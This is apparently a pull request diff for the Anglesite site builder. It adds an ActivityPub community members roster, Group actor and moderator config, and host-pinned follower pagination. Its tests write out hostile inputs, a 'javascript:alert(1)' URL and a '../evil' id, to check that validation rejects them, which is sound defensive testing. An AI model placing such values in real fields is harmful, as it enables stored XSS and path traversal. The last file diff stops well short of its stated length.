### PR TITLE
feat(activitypub): community membership snapshot + Group actor config (#907)

### DIFF
--- a/Resources/Template/src/components/CommunityMembers.astro
+++ b/Resources/Template/src/components/CommunityMembers.astro
@@ -1,0 +1,83 @@
+---
+// CommunityMembers.astro — renders a hosted community's current-membership snapshots (members =
+// followers, per design doc §2 D3). This is the render half of V-5.1b (#907) — static, updated
+// on rebuild. The snapshots are JSON files in `data/community-members/` (root-level, per
+// CommunityMember.gitPath).
+//
+// Sanitisation contract (CommunityMember.swift): rendered via Astro's default escaping — never
+// `set:html`.
+import { parseCommunityMembers, roster, type CommunityMember } from "../lib/communityMembers.ts";
+
+const mods = import.meta.glob("../../data/community-members/*.json", { eager: true });
+const members = roster(parseCommunityMembers(mods as Record<string, unknown>));
+
+function initial(member: CommunityMember): string {
+  const name = member.name ?? new URL(member.actorURL).hostname;
+  return name.trim().charAt(0).toUpperCase() || "?";
+}
+---
+
+{
+  members.length > 0 ? (
+    <ul class="community-members">
+      {members.map((member) => (
+        <li class="h-card community-member">
+          {member.photo ? (
+            <img
+              class="avatar u-photo"
+              src={member.photo}
+              alt=""
+              loading="lazy"
+              referrerpolicy="no-referrer"
+            />
+          ) : (
+            <span class="avatar avatar-fallback">{initial(member)}</span>
+          )}
+          <a class="p-name u-url" href={member.actorURL} rel="nofollow ugc">
+            {member.name ?? new URL(member.actorURL).hostname}
+          </a>
+        </li>
+      ))}
+    </ul>
+  ) : (
+    <p>No members yet.</p>
+  )
+}
+
+<style>
+  .community-members {
+    list-style: none;
+    padding: 0;
+    margin: 0;
+    display: grid;
+    grid-template-columns: repeat(auto-fill, minmax(12rem, 1fr));
+    gap: 1rem;
+  }
+  .community-member {
+    display: flex;
+    align-items: center;
+    gap: 0.5rem;
+    min-width: 0;
+  }
+  .avatar {
+    width: 2.5rem;
+    height: 2.5rem;
+    border-radius: 50%;
+    object-fit: cover;
+    display: inline-flex;
+    align-items: center;
+    justify-content: center;
+    flex-shrink: 0;
+  }
+  .avatar-fallback {
+    background: var(--color-surface, #f8fafc);
+    color: var(--color-text-muted, #64748b);
+    font-family: var(--font-heading, system-ui);
+    font-size: 1rem;
+  }
+  .community-member a {
+    overflow: hidden;
+    text-overflow: ellipsis;
+    white-space: nowrap;
+  }
+</style>

--- a/Resources/Template/src/components/CommunityTimeline.astro
+++ b/Resources/Template/src/components/CommunityTimeline.astro
@@ -26,7 +26,7 @@ function human(iso: string): string {
 ---
 
 {
-  posts.length > 0 && (
+  posts.length > 0 ? (
     <ol class="community-timeline">
       {posts.map((post) => (
         <li class="h-entry community-post" data-object-type={post.objectType}>
@@ -61,6 +61,8 @@ function human(iso: string): string {
         </li>
       ))}
     </ol>
+  ) : (
+    <p>Nothing published yet.</p>
   )
 }
 

--- a/Resources/Template/src/lib/communityMembers.test.ts
+++ b/Resources/Template/src/lib/communityMembers.test.ts
@@ -1,0 +1,74 @@
+import { test } from "node:test";
+import assert from "node:assert/strict";
+import { parseCommunityMembers, roster } from "./communityMembers.ts";
+
+function raw(overrides: Record<string, unknown> = {}): Record<string, unknown> {
+  return {
+    id: "member-abc123",
+    actorURL: "https://member.example/actor",
+    name: "Jane Doe",
+    photo: "https://member.example/photo.jpg",
+    ...overrides,
+  };
+}
+
+/** Build a glob-shaped module map (JSON eager glob wraps each file in `{ default }`). */
+function mods(...files: Record<string, unknown>[]): Record<string, unknown> {
+  return Object.fromEntries(files.map((f, i) => [`../../data/community-members/f${i}.json`, { default: f }]));
+}
+
+test("parses a valid community member from a glob module map", () => {
+  const all = parseCommunityMembers(mods(raw()));
+  assert.equal(all.length, 1);
+  assert.equal(all[0].id, "member-abc123");
+  assert.equal(all[0].name, "Jane Doe");
+});
+
+test("accepts a bare (non-default-wrapped) module value", () => {
+  const all = parseCommunityMembers({ "../../data/community-members/x.json": raw() });
+  assert.equal(all.length, 1);
+});
+
+test("name and photo are optional", () => {
+  const all = parseCommunityMembers(mods(raw({ name: undefined, photo: undefined })));
+  assert.equal(all.length, 1);
+  assert.equal(all[0].name, undefined);
+  assert.equal(all[0].photo, undefined);
+});
+
+test("skips malformed files with a warning instead of throwing", () => {
+  const warnings: string[] = [];
+  const origWarn = console.warn;
+  console.warn = (...args: unknown[]) => warnings.push(args.join(" "));
+  try {
+    const all = parseCommunityMembers(
+      mods(
+        raw(),
+        raw({ id: "../evil" }), // fails the [A-Za-z0-9_-]+ id rule
+        raw({ actorURL: undefined }), // missing required field
+        raw({ actorURL: "javascript:alert(1)" }), // non-http(s) scheme
+      ),
+    );
+    assert.equal(all.length, 1);
+    assert.equal(warnings.length, 3);
+    assert.match(warnings[0], /communityMembers/);
+  } finally {
+    console.warn = origWarn;
+  }
+});
+
+test("roster sorts alphabetically by name, case-insensitively", () => {
+  const all = parseCommunityMembers(
+    mods(raw({ id: "b", name: "bob" }), raw({ id: "a", name: "Alice" }), raw({ id: "c", name: "Carol" })),
+  );
+  const sorted = roster(all);
+  assert.deepEqual(sorted.map((m) => m.id), ["a", "b", "c"]);
+});
+
+test("roster falls back to the actor's hostname when name is absent", () => {
+  const all = parseCommunityMembers(
+    mods(raw({ id: "a", name: undefined, actorURL: "https://zzz.example/actor" }), raw({ id: "b", name: "Alice" })),
+  );
+  const sorted = roster(all);
+  assert.deepEqual(sorted.map((m) => m.id), ["b", "a"]);
+});

--- a/Resources/Template/src/lib/communityMembers.ts
+++ b/Resources/Template/src/lib/communityMembers.ts
@@ -1,0 +1,73 @@
+/**
+ * Current-membership snapshots (`data/community-members/{id}.json`) — the render half of V-5.1b
+ * (#907). The schema mirrors `CommunityMember.swift` (the authoritative contract, see
+ * `docs/superpowers/specs/2026-07-22-v5-communities-design.md` §4.2): one file per current member
+ * of a hosted community, snapshotted from the Group actor's own Worker followers collection into
+ * the site's git repo. Members = followers (design doc §2 D3) — a member who leaves or is banned
+ * simply drops out of the fetched set, and their snapshot file is removed on the next reconcile.
+ *
+ * Pure logic only — the `import.meta.glob` call lives in `CommunityMembers.astro` (the
+ * `communityPosts.ts`/`CommunityTimeline.astro` pattern) so these functions stay testable under
+ * `npx tsx --test`.
+ *
+ * These files are third-party-derived (any fediverse member of the community can be a follower),
+ * so a malformed one is skipped with a warning, never a build failure — same contract as
+ * `communityPosts.ts`.
+ */
+import { z } from "astro/zod";
+
+/**
+ * `z.string().url()` accepts any scheme `new URL()` can parse, including `javascript:`. These
+ * fields flow straight into `href`/`src` in `CommunityMembers.astro`, so scheme must be
+ * restricted to http(s) to close the stored-XSS vector. Mirrors `communityPosts.ts`'s `httpUrl`.
+ */
+const httpUrl = z.string().url().refine(
+  (s) => {
+    try {
+      return ["http:", "https:"].includes(new URL(s).protocol);
+    } catch {
+      return false;
+    }
+  },
+  { message: "must be an http(s) URL" },
+);
+
+const communityMemberSchema = z.object({
+  /// Path-traversal guard: same rule as CommunityMember.swift's init.
+  id: z.string().regex(/^[A-Za-z0-9_-]+$/),
+  actorURL: httpUrl,
+  name: z.string().optional(),
+  photo: httpUrl.optional(),
+});
+
+export type CommunityMember = z.infer<typeof communityMemberSchema>;
+
+/**
+ * Validates a glob module map (path → JSON module) into community members. Eager JSON globs wrap
+ * each file in `{ default }`; bare values are accepted too. Invalid files are skipped with a
+ * `console.warn` naming the file — mirrors `communityPosts.ts`'s `parseCommunityPosts`.
+ */
+export function parseCommunityMembers(mods: Record<string, unknown>): CommunityMember[] {
+  const out: CommunityMember[] = [];
+  for (const [path, mod] of Object.entries(mods)) {
+    const value = mod && typeof mod === "object" && "default" in mod ? (mod as { default: unknown }).default : mod;
+    const parsed = communityMemberSchema.safeParse(value);
+    if (!parsed.success) {
+      console.warn(`[communityMembers] skipping invalid snapshot ${path}: ${parsed.error.issues[0]?.message ?? "invalid"}`);
+      continue;
+    }
+    out.push(parsed.data);
+  }
+  return out;
+}
+
+/** Alphabetical by display name (falling back to the actor host) — a membership roster, not a
+ * timeline, so there's no natural chronological order to sort by (see CommunityMember.swift's
+ * "no joinedAt" note). */
+export function roster(members: CommunityMember[]): CommunityMember[] {
+  return [...members].sort((a, b) => memberSortKey(a).localeCompare(memberSortKey(b)));
+}
+
+function memberSortKey(member: CommunityMember): string {
+  return (member.name ?? new URL(member.actorURL).hostname).toLowerCase();
+}

--- a/Resources/Template/src/pages/community/about.md
+++ b/Resources/Template/src/pages/community/about.md
@@ -1,0 +1,10 @@
+---
+layout: ../../layouts/BaseLayout.astro
+title: "About & Rules"
+description: "What this community is about, and its rules for members."
+---
+
+# About & Rules
+
+Edit this page in Anglesite (File ▸ open this page) to describe your community and set out
+its rules for members.

--- a/Resources/Template/src/pages/community/members.astro
+++ b/Resources/Template/src/pages/community/members.astro
@@ -1,0 +1,15 @@
+---
+// Members page (#907, design doc §4.2) — one of the group preset's four pages (home, about/
+// rules, members, timeline). Ships in the base template so the render pipeline round-trips end
+// to end (mirrors CommunityTimeline.astro's own "ships now, inert until wired" precedent): the
+// page renders "No members yet" on every ordinary site, since data/community-members/ is only
+// ever populated once a hosted-community provisioning flow sets
+// SiteSettings.communityActorURL and CommunityMembersSync starts snapshotting.
+import BaseLayout from "../../layouts/BaseLayout.astro";
+import CommunityMembers from "../../components/CommunityMembers.astro";
+---
+
+<BaseLayout title="Members" description="Who's part of this community.">
+  <h1>Members</h1>
+  <CommunityMembers />
+</BaseLayout>

--- a/Resources/Template/src/pages/community/timeline.astro
+++ b/Resources/Template/src/pages/community/timeline.astro
@@ -1,0 +1,14 @@
+---
+// Community timeline page (#907, design doc §4.2) — mounts CommunityTimeline.astro, which
+// shipped in #908 ("the actual timeline page that mounts it is #907's group-preset scope").
+// Renders "Nothing published yet" on every ordinary site, since data/community-posts/ is only
+// ever populated once a hosted-community provisioning flow sets SiteSettings.communityOutboxURL
+// and AnnouncedPostSync starts snapshotting.
+import BaseLayout from "../../layouts/BaseLayout.astro";
+import CommunityTimeline from "../../components/CommunityTimeline.astro";
+---
+
+<BaseLayout title="Community Timeline" description="What this community's members have shared.">
+  <h1>Community Timeline</h1>
+  <CommunityTimeline />
+</BaseLayout>

--- a/Resources/Template/worker/worker.test.ts
+++ b/Resources/Template/worker/worker.test.ts
@@ -17,6 +17,7 @@ import {
   handleSolidPod,
   handleWebdav,
   handleWebdavCredentials,
+  activityPubConfig,
   type InboxKV,
   type WorkerEnv,
 } from "./worker";
@@ -1622,4 +1623,63 @@ test("scheduled dispatch: \"*/5 * * * *\" routes to solid-pod GC, \"*/15 * * * *
   await expect(
     worker.scheduled!(microsubController, testEnv, createExecutionContext()),
   ).resolves.toBeUndefined();
+});
+
+// activityPubConfig: AP_ACTOR_TYPE/AP_MODERATORS wiring (V-5.1b, #907). A plain mock env/request
+// is enough — activityPubConfig is a pure, synchronous mapping that never touches the ACTOR
+// Durable Object, so no real binding is needed.
+function makeActivityPubEnv(overrides: Partial<WorkerEnv> = {}): WorkerEnv {
+  return {
+    ACTOR: {} as WorkerEnv["ACTOR"],
+    AP_PRIVATE_KEY: "private-key",
+    AP_PUBLIC_KEY: "public-key",
+    ...overrides,
+  } as WorkerEnv;
+}
+
+test("activityPubConfig: returns null when ActivityPub isn't fully provisioned", () => {
+  const request = new Request("https://example.com/");
+  expect(activityPubConfig(request, makeActivityPubEnv({ ACTOR: undefined }))).toBeNull();
+  expect(activityPubConfig(request, makeActivityPubEnv({ AP_PRIVATE_KEY: undefined }))).toBeNull();
+  expect(activityPubConfig(request, makeActivityPubEnv({ AP_PUBLIC_KEY: undefined }))).toBeNull();
+});
+
+test("activityPubConfig: defaults to a Person actor with no moderators when AP_ACTOR_TYPE is unset", () => {
+  const request = new Request("https://example.com/");
+  const config = activityPubConfig(request, makeActivityPubEnv());
+  expect(config?.actor.type).toBeUndefined();
+  expect(config?.moderators).toBeUndefined();
+});
+
+test("activityPubConfig: AP_ACTOR_TYPE=Group sets actor.type to Group", () => {
+  const request = new Request("https://example.com/");
+  const config = activityPubConfig(request, makeActivityPubEnv({ AP_ACTOR_TYPE: "Group" }));
+  expect(config?.actor.type).toBe("Group");
+});
+
+test("activityPubConfig: a non-Group AP_ACTOR_TYPE value is treated as Person", () => {
+  const request = new Request("https://example.com/");
+  const config = activityPubConfig(request, makeActivityPubEnv({ AP_ACTOR_TYPE: "Person" }));
+  expect(config?.actor.type).toBeUndefined();
+});
+
+test("activityPubConfig: splits AP_MODERATORS on commas into the moderators list for a Group actor", () => {
+  const request = new Request("https://example.com/");
+  const config = activityPubConfig(
+    request,
+    makeActivityPubEnv({
+      AP_ACTOR_TYPE: "Group",
+      AP_MODERATORS: "https://mod1.example/actor,https://mod2.example/actor",
+    }),
+  );
+  expect(config?.moderators).toEqual(["https://mod1.example/actor", "https://mod2.example/actor"]);
+});
+
+test("activityPubConfig: AP_MODERATORS is ignored (undefined) for a Person actor", () => {
+  const request = new Request("https://example.com/");
+  const config = activityPubConfig(
+    request,
+    makeActivityPubEnv({ AP_MODERATORS: "https://mod1.example/actor" }),
+  );
+  expect(config?.moderators).toBeUndefined();
 });

--- a/Resources/Template/worker/worker.ts
+++ b/Resources/Template/worker/worker.ts
@@ -121,14 +121,22 @@ export interface WorkerEnv extends IndieAuthEnv {
    * app-generated — see `ActivityPubKeyProvisioning.swift`). `AP_PUBLISH_TOKEN` gates the
    * owner-only publish endpoint the Micropub fan-out below calls internally.
    * `AP_DISPLAY_NAME` is the actor's `Person.name`, threaded from `SiteSettings.displayName`;
-   * falls back to a generic name when unset. See `WorkerComposition.generateWranglerToml`
-   * (Swift) for the binding generation.
+   * falls back to a generic name when unset. `AP_ACTOR_TYPE` selects the AS2 actor type
+   * (V-5.1b, #907): `"Group"` hosts a community (member posts wrapped in `Announce` and fanned
+   * out, moderation activities honored from `AP_MODERATORS`); anything else — including unset —
+   * is an ordinary `Person`. `AP_MODERATORS` is a comma-joined list of moderator actor IRIs
+   * (`SiteSettings.moderators`), ignored for a `Person` actor; comma-joined because Wrangler vars
+   * have no native list type — a moderator IRI containing a literal comma is excluded entirely on
+   * the Swift side (`WorkerComposition.generateWranglerToml`) rather than corrupting the join.
+   * See `WorkerComposition.generateWranglerToml` (Swift) for the binding generation.
    */
   ACTOR?: DurableObjectNamespace<ActivityPubObject>;
   AP_PRIVATE_KEY?: string;
   AP_PUBLIC_KEY?: string;
   AP_PUBLISH_TOKEN?: string;
   AP_DISPLAY_NAME?: string;
+  AP_ACTOR_TYPE?: string;
+  AP_MODERATORS?: string;
   /**
    * Solid-OIDC signing key (V-storage, identity layer for `@dwk/solid-pod`). Optional: a site
    * that hasn't provisioned Solid-OIDC has none of it bound, and every `/oidc/*` route degrades
@@ -1077,16 +1085,28 @@ async function fanOutMicropubCreateToActivityPub(
  */
 const ACTIVITYPUB_USERNAME = "site";
 
-function activityPubConfig(request: Request, env: WorkerEnv): ActivityPubConfig | null {
+/**
+ * Exported for `worker.test.ts` — a pure, synchronous mapping from `env` to
+ * `@dwk/activitypub`'s config shape, so the `AP_ACTOR_TYPE`/`AP_MODERATORS` wiring (V-5.1b, #907)
+ * is testable without standing up a real Durable Object.
+ */
+export function activityPubConfig(request: Request, env: WorkerEnv): ActivityPubConfig | null {
   if (!env.ACTOR || !env.AP_PRIVATE_KEY || !env.AP_PUBLIC_KEY) return null;
   const baseUrl = new URL(request.url).origin;
+  const isGroup = env.AP_ACTOR_TYPE === "Group";
   return {
     baseUrl,
     actor: {
       username: ACTIVITYPUB_USERNAME,
       name: env.AP_DISPLAY_NAME ?? new URL(baseUrl).hostname,
       summary: `Posts from ${new URL(baseUrl).hostname}`,
+      type: isGroup ? "Group" : undefined,
     },
+    // Only meaningful for a Group actor — @dwk/activitypub ignores this for a Person, but the
+    // check here also guards against a stray AP_MODERATORS on an otherwise-Person site.
+    moderators: isGroup && env.AP_MODERATORS
+      ? env.AP_MODERATORS.split(",").filter((iri) => iri.length > 0)
+      : undefined,
     publicKeyPem: env.AP_PUBLIC_KEY,
     privateKeyPem: env.AP_PRIVATE_KEY,
     publishToken: env.AP_PUBLISH_TOKEN,

--- a/Sources/AnglesiteApp/PreviewModel.swift
+++ b/Sources/AnglesiteApp/PreviewModel.swift
@@ -211,6 +211,11 @@ final class PreviewModel {
             // (SiteSettings.communityOutboxURL unset — inert until #907 ships that site kind).
             _ = await AnnouncedPostSync.pullAndCommitIfConfigured(
                 siteDirectory: siteDirectory, configDirectory: configDirectory)
+            // #907: pull a hosted community's own followers collection (members = followers) and
+            // snapshot current membership into the git working copy. No-ops for sites that aren't
+            // a hosted community (SiteSettings.communityActorURL unset).
+            _ = await CommunityMembersSync.pullAndCommitIfConfigured(
+                siteDirectory: siteDirectory, configDirectory: configDirectory)
             clearDevServerCommandInFlight(token: token)
         }
     }

--- a/Sources/AnglesiteCore/CommunityMember.swift
+++ b/Sources/AnglesiteCore/CommunityMember.swift
@@ -1,0 +1,76 @@
+// Sources/AnglesiteCore/CommunityMember.swift
+import Foundation
+
+/// Schema for one current member of a hosted community, snapshotted from the Group actor's own
+/// public followers collection into `Source/` git (V-5.1b, #907). Members = followers (design
+/// doc §2 D3) — this mirrors `AnnouncedPost`'s reconcile-against-current-set discipline, but for
+/// the membership set rather than the announced-post stream: a member who leaves or is banned
+/// simply drops out of the fetched collection, and their snapshot file is removed on the next
+/// reconcile (`CommunityMemberCommitter`).
+///
+/// One file per member at `Source/data/community-members/{id}.json`. See
+/// `docs/superpowers/specs/2026-07-22-v5-communities-design.md` §4.2.
+///
+/// **Sanitisation contract:** `id` is validated at construction time — only `[A-Za-z0-9_-]+` is
+/// accepted — to prevent path-traversal through `gitPath`. `actorURL`/`photo` are restricted to
+/// `http`/`https` schemes at construction time, mirroring `AnnouncedPost`'s contract exactly:
+/// both flow straight into `href`/`src` in `CommunityMembers.astro`.
+///
+/// **No `joinedAt`.** The AS2 followers collection (`GET <actor>/followers`) is a plain ordered
+/// list of actor IRIs with no per-item metadata — there is nothing to snapshot a join timestamp
+/// from, so this schema doesn't fabricate one.
+public struct CommunityMember: Codable, Sendable, Equatable, Identifiable {
+    /// Stable, filesystem-safe id derived from ``actorURL`` (see
+    /// `CommunityMembersSync.fileID(for:)`).
+    public let id: String
+    /// The member's own actor IRI — canonical per FEP-1b12 (their profile/site stays
+    /// authoritative; this is only the community's record of who's currently a member).
+    public let actorURL: URL
+    /// The member's display name, if the actor profile lookup resolved one. `nil` when the
+    /// profile fetch failed or the actor omitted a name.
+    public let name: String?
+    /// The member's avatar URL, if resolved. Same web-scheme validation as ``actorURL``, since it
+    /// flows into a `src`.
+    public let photo: URL?
+
+    /// The relative path within `Source/` where this member's snapshot is stored in git.
+    ///
+    /// For example: `"data/community-members/member-0123456789abcdef.json"`
+    public var gitPath: String { "data/community-members/\(id).json" }
+
+    /// Construction-time rejections enforcing the type-level sanitisation contract.
+    public enum ValidationError: Error, Sendable {
+        /// The id contained characters outside `[A-Za-z0-9_-]` — rejected so ``gitPath`` can
+        /// never be steered outside `data/community-members/`.
+        case invalidID(String)
+        /// A URL destined for `href`/`src` carried a non-`http(s)` scheme (`javascript:`,
+        /// `data:`, …).
+        case insecureURL(URL)
+    }
+
+    /// `http`/`https` only — matches `AnnouncedPost.requireWebScheme` and `communityMembers.ts`'s
+    /// `httpUrl` zod refinement exactly.
+    private static func requireWebScheme(_ url: URL) throws {
+        guard let scheme = url.scheme?.lowercased(), scheme == "http" || scheme == "https" else {
+            throw ValidationError.insecureURL(url)
+        }
+    }
+
+    /// Validating initializer — the choke point for programmatic construction, enforcing the
+    /// type-level sanitisation contract. Note the synthesized `Decodable` path does *not* run
+    /// these checks; decoded files rely on the template's zod validation downstream.
+    ///
+    /// - Throws: ``ValidationError/invalidID(_:)`` when `id` strays outside `[A-Za-z0-9_-]+`, or
+    ///   ``ValidationError/insecureURL(_:)`` when `actorURL` — or `photo` — isn't `http`/`https`.
+    public init(id: String, actorURL: URL, name: String?, photo: URL?) throws {
+        guard id.range(of: #"^[A-Za-z0-9_-]+$"#, options: .regularExpression) != nil else {
+            throw ValidationError.invalidID(id)
+        }
+        try Self.requireWebScheme(actorURL)
+        if let photo { try Self.requireWebScheme(photo) }
+        self.id = id
+        self.actorURL = actorURL
+        self.name = name
+        self.photo = photo
+    }
+}

--- a/Sources/AnglesiteCore/CommunityMemberCommitter.swift
+++ b/Sources/AnglesiteCore/CommunityMemberCommitter.swift
@@ -1,0 +1,85 @@
+import Foundation
+
+/// Writes a hosted community's current membership into the site's local git working copy as
+/// `data/community-members/{id}.json` files (V-5.1b, #907), mirroring `AnnouncedPostCommitter`
+/// (#908) exactly. Like that committer, this reconciles against the *full current set* every
+/// call rather than draining a staging queue: the Worker's followers collection stays the
+/// permanent operational store, so a member who left (or was banned, #370) simply drops out of
+/// the fetched set and their stale snapshot file must be removed on the next reconcile too.
+public enum CommunityMemberCommitter {
+    /// JSON encoding for one member's snapshot file: sorted keys (stable, clean diffs), matching
+    /// the Astro template's zod schema (`Resources/Template/src/lib/communityMembers.ts`) and
+    /// `CommunityMemberTests`'s own round-trip fixture.
+    public static func jsonData(for member: CommunityMember) throws -> Data {
+        let encoder = JSONEncoder()
+        encoder.outputFormatting = [.prettyPrinted, .sortedKeys]
+        return try encoder.encode(member)
+    }
+
+    /// Reconciles `data/community-members/` under `siteDirectory` against `members` (the full,
+    /// current set from the community's own Worker followers collection) and commits the result
+    /// in one commit:
+    /// - a new or changed member is written (or overwritten) at its `gitPath`
+    /// - an existing snapshot file whose id is absent from `members` is deleted
+    /// - unchanged files are left untouched, so a sync with nothing new is a true no-op — no
+    ///   empty commit, no git subprocess/libgit2 call at all
+    ///
+    /// Returns every id actually touched by the resulting commit — written (new or changed) or
+    /// deleted (no longer a member) — empty (never throws) if there was nothing to reconcile, or
+    /// if the git commit closure failed, so an interrupted or failed sync simply re-attempts the
+    /// same reconcile next time rather than losing state.
+    @discardableResult
+    public static func commit(
+        members: [CommunityMember],
+        into siteDirectory: URL,
+        fileManager: FileManager = .default,
+        gitCommitBatch: @Sendable (URL, [String], String) async -> String? = InboxSubmissionCommitter.processGitCommitBatch
+    ) async -> [String] {
+        let membersDir = siteDirectory.appendingPathComponent("data/community-members", isDirectory: true)
+        let currentIDs = Set(members.map(\.id))
+
+        var relPaths: [String] = []
+        var writtenIDs: [String] = []
+        var deletedIDs: [String] = []
+
+        let existingFiles = (try? fileManager.contentsOfDirectory(at: membersDir, includingPropertiesForKeys: nil)) ?? []
+        for file in existingFiles where file.pathExtension == "json" {
+            let id = file.deletingPathExtension().lastPathComponent
+            guard !currentIDs.contains(id) else { continue }
+            guard (try? fileManager.removeItem(at: file)) != nil else { continue }
+            relPaths.append("data/community-members/\(id).json")
+            deletedIDs.append(id)
+        }
+
+        if !members.isEmpty {
+            try? fileManager.createDirectory(at: membersDir, withIntermediateDirectories: true)
+        }
+        for member in members {
+            guard let data = try? jsonData(for: member) else { continue }
+            let fileURL = membersDir.appendingPathComponent("\(member.id).json")
+            if let existing = try? Data(contentsOf: fileURL), existing == data { continue }
+            guard (try? data.write(to: fileURL, options: .atomic)) != nil else { continue }
+            relPaths.append(member.gitPath)
+            writtenIDs.append(member.id)
+        }
+
+        guard !relPaths.isEmpty else { return [] }
+
+        let message = Self.commitMessage(writtenCount: writtenIDs.count, deletedCount: deletedIDs.count)
+        guard await gitCommitBatch(siteDirectory, relPaths, message) != nil else { return [] }
+        return writtenIDs + deletedIDs
+    }
+
+    /// Describes what actually changed, since a reconcile can be a pure write (new members), a
+    /// pure delete (members who left/were banned), or both at once.
+    static func commitMessage(writtenCount: Int, deletedCount: Int) -> String {
+        switch (writtenCount, deletedCount) {
+        case (let w, 0):
+            return w == 1 ? "chore: snapshot 1 community member" : "chore: snapshot \(w) community members"
+        case (0, let d):
+            return d == 1 ? "chore: remove 1 community member" : "chore: remove \(d) community members"
+        case (let w, let d):
+            return "chore: snapshot \(w) community member\(w == 1 ? "" : "s"), remove \(d)"
+        }
+    }
+}

--- a/Sources/AnglesiteCore/CommunityMembersSync.swift
+++ b/Sources/AnglesiteCore/CommunityMembersSync.swift
@@ -14,9 +14,9 @@ import FoundationNetworking
 /// Like `AnnouncedPostSync`, this needs **no Cloudflare API token**: `GET <actor>/followers` is
 /// the same public, unauthenticated AS2 collection every ActivityPub actor serves.
 ///
-/// Not yet wired into `PreviewModel.open(site:)` alongside the other per-site syncs — that needs
-/// `SiteSettings.communityActorURL` to actually be set by a provisioning flow first, which is
-/// follow-up work to this slice of #907.
+/// Wired into `PreviewModel.open(site:)` alongside the other per-site syncs; inert (no network
+/// call) until a provisioning flow sets `SiteSettings.communityActorURL`, which is follow-up
+/// work to this slice of #907 — see `pullAndCommitIfConfigured`.
 public enum CommunityMembersSync {
     /// Fetch transport for the followers client — public so callers (tests) can inject a fake
     /// without reaching into the internal ``FollowersCollectionClient`` type.
@@ -43,26 +43,51 @@ public enum CommunityMembersSync {
     /// Pages a Group actor's own public `followers` collection. Same unauthenticated, HTTPS-only,
     /// capped, AS2-collection-paging shape as `AnnouncedPostSync.OutboxClient` — a followers
     /// collection's `orderedItems` are bare actor IRI strings rather than embedded activities.
+    ///
+    /// **Host-pinned pagination.** `first`/`next` are extracted from the *remote* community
+    /// server's own JSON response bodies, not constructed by this app — an unauthenticated fetch
+    /// of a URL the site owner configures (`communityActorURL`). A malicious or compromised
+    /// community server could otherwise steer the pagination chain at arbitrary other https
+    /// hosts (bounded only by `pullAndCommit`'s 50-page cap, not by an origin check). `first`/
+    /// `next` are treated as absent — not thrown — when they don't match ``trustedHost``, so an
+    /// off-host link simply ends the chain early rather than failing the whole sync. Member
+    /// actor IRIs themselves (`orderedItems`) are deliberately *not* host-pinned: members
+    /// legitimately live on any remote host (Mastodon, Lemmy, another Anglesite site, …) — only
+    /// the pagination links that decide what this fetch trusts as "part of the collection" are.
     struct FollowersCollectionClient: Sendable {
         /// 1 MB — matches `AnnouncedPostSync.OutboxClient.maximumResponseBytes`.
         static let maximumResponseBytes = 1024 * 1024
 
         let transport: Transport
+        /// Lowercased host of the actor whose followers collection this client was constructed
+        /// for — every `first`/`next` link is required to stay on this host (see the type doc).
+        let trustedHost: String
 
-        init(transport: @escaping Transport = FollowersCollectionClient.defaultTransport) {
+        init(actorURL: URL, transport: @escaping Transport = FollowersCollectionClient.defaultTransport) {
             self.transport = transport
+            self.trustedHost = (actorURL.host ?? "").lowercased()
+        }
+
+        /// A pagination link (`first`/`next`) is used only when it parses as a URL *and* its host
+        /// matches ``trustedHost`` — anything else (a different host, an unparseable string) is
+        /// treated the same as "no more pages" rather than followed.
+        private func trustedPaginationLink(_ value: Any?) -> URL? {
+            guard let string = value as? String, let url = URL(string: string),
+                  url.host?.lowercased() == trustedHost
+            else { return nil }
+            return url
         }
 
         func collection(at followersURL: URL) async throws -> URL? {
             let json = try await fetch(followersURL)
-            return (json["first"] as? String).flatMap(URL.init(string:))
+            return trustedPaginationLink(json["first"])
         }
 
         func page(at url: URL) async throws -> (actorURLs: [URL], next: URL?) {
             let json = try await fetch(url)
             let rawItems = (json["orderedItems"] as? [Any]) ?? []
             let actorURLs = rawItems.compactMap(Self.actorURL(from:))
-            let next = (json["next"] as? String).flatMap(URL.init(string:))
+            let next = trustedPaginationLink(json["next"])
             return (actorURLs, next)
         }
 
@@ -176,7 +201,7 @@ public enum CommunityMembersSync {
         now: Date = Date()
     ) async -> Int {
         let followersURL = actorURL.appendingPathComponent("followers")
-        let client = FollowersCollectionClient(transport: transport)
+        let client = FollowersCollectionClient(actorURL: actorURL, transport: transport)
         guard let firstPage = try? await client.collection(at: followersURL) else { return 0 }
 
         var actorURLs: [URL] = []

--- a/Sources/AnglesiteCore/CommunityMembersSync.swift
+++ b/Sources/AnglesiteCore/CommunityMembersSync.swift
@@ -1,0 +1,225 @@
+import Foundation
+#if canImport(FoundationNetworking)
+import FoundationNetworking
+#endif
+
+/// Orchestrates #907's "pull a hosted community's own followers collection and snapshot current
+/// membership into the site's git working copy" step: page the Group actor's public `followers`
+/// collection (``FollowersCollectionClient``), resolve each member's profile
+/// (`ActorProfileFetcher`/`ActorProfileCache`, same as `AnnouncedPostSync`/`FollowersModel`'s
+/// enrichment), then reconcile + commit (`CommunityMemberCommitter`). Mirrors `AnnouncedPostSync`
+/// (#908) exactly, but reads the actor's `followers` collection instead of its `outbox` — members
+/// = followers (design doc §2 D3).
+///
+/// Like `AnnouncedPostSync`, this needs **no Cloudflare API token**: `GET <actor>/followers` is
+/// the same public, unauthenticated AS2 collection every ActivityPub actor serves.
+///
+/// Not yet wired into `PreviewModel.open(site:)` alongside the other per-site syncs — that needs
+/// `SiteSettings.communityActorURL` to actually be set by a provisioning flow first, which is
+/// follow-up work to this slice of #907.
+public enum CommunityMembersSync {
+    /// Fetch transport for the followers client — public so callers (tests) can inject a fake
+    /// without reaching into the internal ``FollowersCollectionClient`` type.
+    public typealias Transport = @Sendable (URLRequest) async throws -> (Data, HTTPURLResponse)
+
+    /// Production transport — re-exposed at this (public) level since ``FollowersCollectionClient``
+    /// itself stays internal, mirroring `AnnouncedPostSync.defaultTransport`.
+    public static let defaultTransport: Transport = FollowersCollectionClient.defaultTransport
+
+    /// Failures from fetching or parsing a followers collection. `Equatable` so tests can assert
+    /// on the exact failure; ``CommunityMembersSync/pullAndCommit(actorURL:siteDirectory:configDirectory:transport:now:)``
+    /// itself swallows these (returning 0) since a transient network error just means "try again
+    /// on the next site-open".
+    public enum FollowersError: Equatable, Error, Sendable {
+        /// The followers URL, or the URL a redirect actually landed on, wasn't `https`.
+        case insecureURL
+        /// A non-2xx response, a transport error (status 0), or an over-cap response body.
+        /// `body` carries a truncated excerpt for diagnostics, not for parsing.
+        case requestFailed(status: Int, body: String)
+        /// The response wasn't the JSON object shape an AS2 collection page must be.
+        case decodingFailed(String)
+    }
+
